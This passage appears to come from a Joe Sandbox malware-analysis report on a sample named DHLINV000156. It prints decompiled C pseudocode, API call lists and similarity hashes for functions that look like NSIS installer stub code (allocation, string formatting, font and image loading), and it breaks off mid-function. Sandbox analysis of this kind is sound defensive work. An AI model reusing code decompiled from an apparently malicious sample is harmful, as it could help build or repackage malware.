                                        0x0040283a
                                        0x0040283d
                                        0x00402842
                                        0x00402842
                                        0x0040284c
                                        0x0040284c
                                        0x00402859
                                        0x0040285f
                                        0x00402865
                                        0x00402866
                                        0x00402867
                                        0x0040286a
                                        0x00402871
                                        0x00402871
                                        0x00402877
                                        0x00402877
                                        0x00402882
                                        0x00402883
                                        0x00402887
                                        0x0040288b
                                        0x00402891
                                        0x00402891
                                        0x00402898
                                        0x004022a4
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                        • GlobalFree.KERNEL32 ref: 0040284C
                                        • GlobalFree.KERNEL32 ref: 0040285F
                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: d8962bc5da80a952d71843fdd2bcaf86795e36f6a6ef68a6a5081b931e868eb5
                                        • Instruction ID: ec0d33f595d451752a188c19515fdbd8f87975fde9c964b970e1a5072f162152
                                        • Opcode Fuzzy Hash: d8962bc5da80a952d71843fdd2bcaf86795e36f6a6ef68a6a5081b931e868eb5
                                        • Instruction Fuzzy Hash: 7D219C72C00124BBCF213FA5CD49DAE7F79EF09364B10823AF520762E0C67959419FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E004048B1(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                        				char _v36;
                                        				char _v68;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t21;
                                        				signed int _t22;
                                        				void* _t29;
                                        				void* _t31;
                                        				void* _t32;
                                        				void* _t41;
                                        				signed int _t43;
                                        				signed int _t47;
                                        				signed int _t50;
                                        				signed int _t51;
                                        				signed int _t53;
                                        
                                        				_t21 = _a16;
                                        				_t51 = _a12;
                                        				_t41 = 0xffffffdc;
                                        				if(_t21 == 0) {
                                        					_push(0x14);
                                        					_pop(0);
                                        					_t22 = _t51;
                                        					if(_t51 < 0x100000) {
                                        						_push(0xa);
                                        						_pop(0);
                                        						_t41 = 0xffffffdd;
                                        					}
                                        					if(_t51 < 0x400) {
                                        						_t41 = 0xffffffde;
                                        					}
                                        					if(_t51 < 0xffff3333) {
                                        						_t50 = 0x14;
                                        						asm("cdq");
                                        						_t22 = 1 / _t50 + _t51;
                                        					}
                                        					_t23 = _t22 & 0x00ffffff;
                                        					_t53 = _t22 >> 0;
                                        					_t43 = 0xa;
                                        					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                        				} else {
                                        					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                        					_t47 = 0;
                                        				}
                                        				_t29 = E00405FFC(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                        				_t31 = E00405FFC(_t41, _t47, _t53,  &_v68, _t41);
                                        				_t32 = E00405FFC(_t41, _t47, 0x41fd08, 0x41fd08, _a8);
                                        				wsprintfA(_t32 + lstrlenA(0x41fd08), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                        				return SetDlgItemTextA( *0x422ed8, _a4, 0x41fd08);
                                        			}



















                                        0x004048b7
                                        0x004048bc
                                        0x004048c4
                                        0x004048c5
                                        0x004048d2
                                        0x004048da
                                        0x004048db
                                        0x004048dd
                                        0x004048df
                                        0x004048e1
                                        0x004048e4
                                        0x004048e4
                                        0x004048eb
                                        0x004048f1
                                        0x004048f1
                                        0x004048f8
                                        0x004048ff
                                        0x00404902
                                        0x00404905
                                        0x00404905
                                        0x00404909
                                        0x00404919
                                        0x0040491b
                                        0x0040491e
                                        0x004048c7
                                        0x004048c7
                                        0x004048ce
                                        0x004048ce
                                        0x00404926
                                        0x00404931
                                        0x00404947
                                        0x00404957
                                        0x00404973

                                        APIs
                                        • lstrlenA.KERNEL32(Sepad149: Installing,Sepad149: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                        • wsprintfA.USER32 ref: 00404957
                                        • SetDlgItemTextA.USER32 ref: 0040496A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$Sepad149: Installing
                                        • API String ID: 3540041739-3440464719
                                        • Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                        • Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
                                        • Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                        • Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E73EF1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                        				void* _v8;
                                        				signed int _v12;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				char _v52;
                                        				void _t45;
                                        				void _t46;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				signed int _t59;
                                        				signed int _t60;
                                        				signed int _t61;
                                        				void* _t67;
                                        				void* _t68;
                                        				void* _t69;
                                        				void* _t70;
                                        				void* _t71;
                                        				signed int _t77;
                                        				void* _t81;
                                        				signed int _t83;
                                        				signed int _t85;
                                        				signed int _t87;
                                        				signed int _t90;
                                        				void* _t101;
                                        
                                        				_t85 = __edx;
                                        				 *0x73ef405c = _a8;
                                        				_t77 = 0;
                                        				 *0x73ef4060 = _a16;
                                        				_v12 = 0;
                                        				_v8 = E73EF123B();
                                        				_t90 = E73EF12FE(_t42);
                                        				_t87 = _t85;
                                        				_t81 = E73EF123B();
                                        				_a8 = _t81;
                                        				_t45 =  *_t81;
                                        				if(_t45 != 0x7e && _t45 != 0x21) {
                                        					_a16 = E73EF123B();
                                        					_t77 = E73EF12FE(_t74);
                                        					_v12 = _t85;
                                        					GlobalFree(_a16);
                                        					_t81 = _a8;
                                        				}
                                        				_t46 =  *_t81;
                                        				_t101 = _t46 - 0x2f;
                                        				if(_t101 > 0) {
                                        					_t47 = _t46 - 0x3c;
                                        					__eflags = _t47;
                                        					if(_t47 == 0) {
                                        						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                        						if( *((char*)(_t81 + 1)) != 0x3c) {
                                        							__eflags = _t87 - _v12;
                                        							if(__eflags > 0) {
                                        								L56:
                                        								_t48 = 0;
                                        								__eflags = 0;
                                        								L57:
                                        								asm("cdq");
                                        								L58:
                                        								_t90 = _t48;
                                        								_t87 = _t85;
                                        								L59:
                                        								E73EF1429(_t85, _t90, _t87,  &_v52);
                                        								E73EF1266( &_v52);
                                        								GlobalFree(_v8);
                                        								return GlobalFree(_a8);
                                        							}
                                        							if(__eflags < 0) {
                                        								L49:
                                        								__eflags = 0;
                                        								L50:
                                        								_t48 = 1;
                                        								goto L57;
                                        							}
                                        							__eflags = _t90 - _t77;
                                        							if(_t90 < _t77) {
                                        								goto L49;
                                        							}
                                        							goto L56;
                                        						}
                                        						_t85 = _t87;
                                        						_t48 = E73EF2EF0(_t90, _t77, _t85);
                                        						goto L58;
                                        					}
                                        					_t57 = _t47 - 1;
                                        					__eflags = _t57;
                                        					if(_t57 == 0) {
                                        						__eflags = _t90 - _t77;
                                        						if(_t90 != _t77) {
                                        							goto L56;
                                        						}
                                        						__eflags = _t87 - _v12;
                                        						if(_t87 != _v12) {
                                        							goto L56;
                                        						}
                                        						goto L49;
                                        					}
                                        					_t58 = _t57 - 1;
                                        					__eflags = _t58;
                                        					if(_t58 == 0) {
                                        						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                        						if( *((char*)(_t81 + 1)) != 0x3e) {
                                        							__eflags = _t87 - _v12;
                                        							if(__eflags < 0) {
                                        								goto L56;
                                        							}
                                        							if(__eflags > 0) {
                                        								goto L49;
                                        							}
                                        							__eflags = _t90 - _t77;
                                        							if(_t90 <= _t77) {
                                        								goto L56;
                                        							}
                                        							goto L49;
                                        						}
                                        						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                        						_t85 = _t87;
                                        						_t59 = _t90;
                                        						_t83 = _t77;
                                        						if( *((char*)(_t81 + 2)) != 0x3e) {
                                        							_t48 = E73EF2F10(_t59, _t83, _t85);
                                        						} else {
                                        							_t48 = E73EF2F40(_t59, _t83, _t85);
                                        						}
                                        						goto L58;
                                        					}
                                        					_t60 = _t58 - 0x20;
                                        					__eflags = _t60;
                                        					if(_t60 == 0) {
                                        						_t90 = _t90 ^ _t77;
                                        						_t87 = _t87 ^ _v12;
                                        						goto L59;
                                        					}
                                        					_t61 = _t60 - 0x1e;
                                        					__eflags = _t61;
                                        					if(_t61 == 0) {
                                        						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                        						if( *((char*)(_t81 + 1)) != 0x7c) {
                                        							_t90 = _t90 | _t77;
                                        							_t87 = _t87 | _v12;
                                        							goto L59;
                                        						}
                                        						__eflags = _t90 | _t87;
                                        						if((_t90 | _t87) != 0) {
                                        							goto L49;
                                        						}
                                        						__eflags = _t77 | _v12;
                                        						if((_t77 | _v12) != 0) {
                                        							goto L49;
                                        						}
                                        						goto L56;
                                        					}
                                        					__eflags = _t61 == 0;
                                        					if(_t61 == 0) {
                                        						_t90 =  !_t90;
                                        						_t87 =  !_t87;
                                        					}
                                        					goto L59;
                                        				}
                                        				if(_t101 == 0) {
                                        					L21:
                                        					__eflags = _t77 | _v12;
                                        					if((_t77 | _v12) != 0) {
                                        						_v24 = E73EF2D80(_t90, _t87, _t77, _v12);
                                        						_v20 = _t85;
                                        						_t48 = E73EF2E30(_t90, _t87, _t77, _v12);
                                        						_t81 = _a8;
                                        					} else {
                                        						_v24 = _v24 & 0x00000000;
                                        						_v20 = _v20 & 0x00000000;
                                        						_t48 = _t90;
                                        						_t85 = _t87;
                                        					}
                                        					__eflags =  *_t81 - 0x2f;
                                        					if( *_t81 != 0x2f) {
                                        						goto L58;
                                        					} else {
                                        						_t90 = _v24;
                                        						_t87 = _v20;
                                        						goto L59;
                                        					}
                                        				}
                                        				_t67 = _t46 - 0x21;
                                        				if(_t67 == 0) {
                                        					_t48 = 0;
                                        					__eflags = _t90 | _t87;
                                        					if((_t90 | _t87) != 0) {
                                        						goto L57;
                                        					}
                                        					goto L50;
                                        				}
                                        				_t68 = _t67 - 4;
                                        				if(_t68 == 0) {
                                        					goto L21;
                                        				}
                                        				_t69 = _t68 - 1;
                                        				if(_t69 == 0) {
                                        					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                        					if( *((char*)(_t81 + 1)) != 0x26) {
                                        						_t90 = _t90 & _t77;
                                        						_t87 = _t87 & _v12;
                                        						goto L59;
                                        					}
                                        					__eflags = _t90 | _t87;
                                        					if((_t90 | _t87) == 0) {
                                        						goto L56;
                                        					}
                                        					__eflags = _t77 | _v12;
                                        					if((_t77 | _v12) == 0) {
                                        						goto L56;
                                        					}
                                        					goto L49;
                                        				}
                                        				_t70 = _t69 - 4;
                                        				if(_t70 == 0) {
                                        					_t48 = E73EF2D40(_t90, _t87, _t77, _v12);
                                        					goto L58;
                                        				} else {
                                        					_t71 = _t70 - 1;
                                        					if(_t71 == 0) {
                                        						_t90 = _t90 + _t77;
                                        						asm("adc edi, [ebp-0x8]");
                                        					} else {
                                        						if(_t71 == 0) {
                                        							_t90 = _t90 - _t77;
                                        							asm("sbb edi, [ebp-0x8]");
                                        						}
                                        					}
                                        					goto L59;
                                        				}
                                        			}





























                                        0x73ef1837
                                        0x73ef1841
                                        0x73ef184a
                                        0x73ef184d
                                        0x73ef1852
                                        0x73ef185b
                                        0x73ef1864
                                        0x73ef1866
                                        0x73ef186d
                                        0x73ef186f
                                        0x73ef1872
                                        0x73ef1876
                                        0x73ef1882
                                        0x73ef188b
                                        0x73ef1890
                                        0x73ef1893
                                        0x73ef1899
                                        0x73ef1899
                                        0x73ef189c
                                        0x73ef189f
                                        0x73ef18a2
                                        0x73ef1968
                                        0x73ef1968
                                        0x73ef196b
                                        0x73ef19e5
                                        0x73ef19e9
                                        0x73ef19f8
                                        0x73ef19fb
                                        0x73ef1a03
                                        0x73ef1a03
                                        0x73ef1a03
                                        0x73ef1a05
                                        0x73ef1a05
                                        0x73ef1a06
                                        0x73ef1a06
                                        0x73ef1a08
                                        0x73ef1a0a
                                        0x73ef1a10
                                        0x73ef1a19
                                        0x73ef1a2a
                                        0x73ef1a35
                                        0x73ef1a35
                                        0x73ef19fd
                                        0x73ef19e0
                                        0x73ef19e0
                                        0x73ef19e2
                                        0x73ef19e2
                                        0x00000000
                                        0x73ef19e2
                                        0x73ef19ff
                                        0x73ef1a01
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1a01
                                        0x73ef19ed
                                        0x73ef19f1
                                        0x00000000
                                        0x73ef19f1
                                        0x73ef196d
                                        0x73ef196d
                                        0x73ef196e
                                        0x73ef19d7
                                        0x73ef19d9
                                        0x00000000
                                        0x00000000
                                        0x73ef19db
                                        0x73ef19de
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef19de
                                        0x73ef1970
                                        0x73ef1970
                                        0x73ef1971
                                        0x73ef19aa
                                        0x73ef19ae
                                        0x73ef19ca
                                        0x73ef19cd
                                        0x00000000
                                        0x00000000
                                        0x73ef19cf
                                        0x00000000
                                        0x00000000
                                        0x73ef19d1
                                        0x73ef19d3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef19d5
                                        0x73ef19b0
                                        0x73ef19b4
                                        0x73ef19b6
                                        0x73ef19b8
                                        0x73ef19ba
                                        0x73ef19c3
                                        0x73ef19bc
                                        0x73ef19bc
                                        0x73ef19bc
                                        0x00000000
                                        0x73ef19ba
                                        0x73ef1973
                                        0x73ef1973
                                        0x73ef1976
                                        0x73ef19a3
                                        0x73ef19a5
                                        0x00000000
                                        0x73ef19a5
                                        0x73ef1978
                                        0x73ef1978
                                        0x73ef197b
                                        0x73ef198b
                                        0x73ef198f
                                        0x73ef199c
                                        0x73ef199e
                                        0x00000000
                                        0x73ef199e
                                        0x73ef1991
                                        0x73ef1993
                                        0x00000000
                                        0x00000000
                                        0x73ef1995
                                        0x73ef1998
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef199a
                                        0x73ef197e
                                        0x73ef197f
                                        0x73ef1985
                                        0x73ef1987
                                        0x73ef1987
                                        0x00000000
                                        0x73ef197f
                                        0x73ef18a8
                                        0x73ef1920
                                        0x73ef1922
                                        0x73ef1925
                                        0x73ef1943
                                        0x73ef1946
                                        0x73ef194c
                                        0x73ef1951
                                        0x73ef1927
                                        0x73ef1927
                                        0x73ef192b
                                        0x73ef192f
                                        0x73ef1931
                                        0x73ef1931
                                        0x73ef1954
                                        0x73ef1957
                                        0x00000000
                                        0x73ef195d
                                        0x73ef195d
                                        0x73ef1960
                                        0x00000000
                                        0x73ef1960
                                        0x73ef1957
                                        0x73ef18aa
                                        0x73ef18ad
                                        0x73ef1911
                                        0x73ef1913
                                        0x73ef1915
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef191b
                                        0x73ef18af
                                        0x73ef18b2
                                        0x00000000
                                        0x00000000
                                        0x73ef18b4
                                        0x73ef18b5
                                        0x73ef18eb
                                        0x73ef18ef
                                        0x73ef1907
                                        0x73ef1909
                                        0x00000000
                                        0x73ef1909
                                        0x73ef18f1
                                        0x73ef18f3
                                        0x00000000
                                        0x00000000
                                        0x73ef18f9
                                        0x73ef18fc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x73ef1902
                                        0x73ef18b7
                                        0x73ef18ba
                                        0x73ef18e1
                                        0x00000000
                                        0x73ef18bc
                                        0x73ef18bc
                                        0x73ef18bd
                                        0x73ef18d1
                                        0x73ef18d3
                                        0x73ef18bf
                                        0x73ef18c1
                                        0x73ef18c7
                                        0x73ef18c9
                                        0x73ef18c9
                                        0x73ef18c1
                                        0x00000000
                                        0x73ef18bd

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FreeGlobal
                                        • String ID:
                                        • API String ID: 2979337801-0
                                        • Opcode ID: 648c9cc0b7083a66214bc72cae3c8868f4bca6f1bb3a60dde207936f439f0988
                                        • Instruction ID: b2b1a8fd2b5cc3c37ad11f6ef7d2e5274cc573332286b056d5a45a5bfe858a01
                                        • Opcode Fuzzy Hash: 648c9cc0b7083a66214bc72cae3c8868f4bca6f1bb3a60dde207936f439f0988
                                        • Instruction Fuzzy Hash: A9511B32D0459FAFEBC28FB4C4447ADBBBAEBC4249F18425ED407A3284D6F1994187A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E00401D41(int __edx) {
                                        				struct HWND__* _t24;
                                        				CHAR* _t30;
                                        				void* _t40;
                                        				void* _t44;
                                        				signed int _t46;
                                        				int _t50;
                                        				signed int _t53;
                                        				void* _t57;
                                        
                                        				_t48 = __edx;
                                        				if(( *(_t57 - 0x2b) & 0x00000001) == 0) {
                                        					_t24 = GetDlgItem( *(_t57 - 8), __edx);
                                        				} else {
                                        					_t24 = E00402B0A(1);
                                        					 *(_t57 - 0x10) = _t48;
                                        				}
                                        				_t46 =  *(_t57 - 0x2c);
                                        				 *(_t57 + 8) = _t24;
                                        				 *(_t57 - 8) = _t46 >> 0x1f;
                                        				_t50 = _t46 & 0x00000003;
                                        				_t53 = _t46 & 0x00000004;
                                        				 *(_t57 - 0x1c) = _t46 >> 0x0000001e & 0x00000001;
                                        				if((_t46 & 0x00010000) == 0) {
                                        					_t30 =  *(_t57 - 0x34) & 0x0000ffff;
                                        				} else {
                                        					_t30 = E00402B2C(_t44);
                                        				}
                                        				 *(_t57 - 0xc) = _t30;
                                        				GetClientRect( *(_t57 + 8), _t57 - 0x58);
                                        				asm("sbb esi, esi");
                                        				_t40 = SendMessageA( *(_t57 + 8), 0x172, _t50, LoadImageA( ~_t53 &  *0x423700,  *(_t57 - 0xc), _t50,  *(_t57 - 0x50) *  *(_t57 - 8),  *(_t57 - 0x4c) *  *(_t57 - 0x1c),  *(_t57 - 0x2c) & 0x0000fef0));
                                        				if(_t40 != _t44 && _t50 == _t44) {
                                        					DeleteObject(_t40);
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t57 - 4));
                                        				return 0;
                                        			}











                                        0x00401d41
                                        0x00401d45
                                        0x00401d58
                                        0x00401d47
                                        0x00401d49
                                        0x00401d4f
                                        0x00401d4f
                                        0x00401d5e
                                        0x00401d61
                                        0x00401d6b
                                        0x00401d72
                                        0x00401d78
                                        0x00401d84
                                        0x00401d87
                                        0x00401d91
                                        0x00401d89
                                        0x00401d8a
                                        0x00401d8a
                                        0x00401d95
                                        0x00401d9f
                                        0x00401dc4
                                        0x00401ddd
                                        0x00401de5
                                        0x00401df4
                                        0x00401df4
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 7dc78e60c32ccc3c09c595abe6c2c4ca27936b49c459a2d12d3c5fdfefad9d6b
                                        • Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
                                        • Opcode Fuzzy Hash: 7dc78e60c32ccc3c09c595abe6c2c4ca27936b49c459a2d12d3c5fdfefad9d6b
                                        • Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E00401DFF(intOrPtr __edx) {
                                        				void* __esi;
                                        				int _t9;
                                        				signed char _t15;
                                        				struct HFONT__* _t18;
                                        				intOrPtr _t30;
                                        				struct HDC__* _t31;
                                        				void* _t33;
                                        				void* _t35;
                                        
                                        				_t30 = __edx;
                                        				_t31 = GetDC( *(_t35 - 8));
                                        				_t9 = E00402B0A(2);
                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                        				0x40a7e8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                        				ReleaseDC( *(_t35 - 8), _t31);
                                        				 *0x40a7f8 = E00402B0A(3);
                                        				_t15 =  *((intOrPtr*)(_t35 - 0x24));
                                        				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                        				 *0x40a7ff = 1;
                                        				 *0x40a7fc = _t15 & 0x00000001;
                                        				 *0x40a7fd = _t15 & 0x00000002;
                                        				 *0x40a7fe = _t15 & 0x00000004;
                                        				E00405FFC(_t9, _t31, _t33, 0x40a804,  *((intOrPtr*)(_t35 - 0x30)));
                                        				_t18 = CreateFontIndirectA(0x40a7e8);
                                        				_push(_t18);
                                        				_push(_t33);
                                        				E00405F38();
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t35 - 4));
                                        				return 0;
                                        			}











                                        0x00401dff
                                        0x00401e0a
                                        0x00401e0c
                                        0x00401e19
                                        0x00401e30
                                        0x00401e35
                                        0x00401e42
                                        0x00401e47
                                        0x00401e4b
                                        0x00401e56
                                        0x00401e5d
                                        0x00401e6f
                                        0x00401e75
                                        0x00401e7a
                                        0x00401e84
                                        0x004025e4
                                        0x00401569
                                        0x00402960
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • GetDC.USER32(?), ref: 00401E02
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                        • ReleaseDC.USER32 ref: 00401E35
                                        • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                        • Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
                                        • Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                        • Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00401C0A(intOrPtr __edx) {
                                        				int _t29;
                                        				long _t30;
                                        				signed int _t32;
                                        				CHAR* _t35;
                                        				long _t36;
                                        				int _t41;
                                        				signed int _t42;
                                        				int _t46;
                                        				int _t56;
                                        				intOrPtr _t57;
                                        				struct HWND__* _t61;
                                        				void* _t64;
                                        
                                        				_t57 = __edx;
                                        				_t29 = E00402B0A(3);
                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                        				 *(_t64 - 8) = _t29;
                                        				_t30 = E00402B0A(4);
                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                        				 *(_t64 + 8) = _t30;
                                        				if(( *(_t64 - 0x20) & 0x00000001) != 0) {
                                        					 *((intOrPtr*)(__ebp - 8)) = E00402B2C(0x33);
                                        				}
                                        				__eflags =  *(_t64 - 0x20) & 0x00000002;
                                        				if(( *(_t64 - 0x20) & 0x00000002) != 0) {
                                        					 *(_t64 + 8) = E00402B2C(0x44);
                                        				}
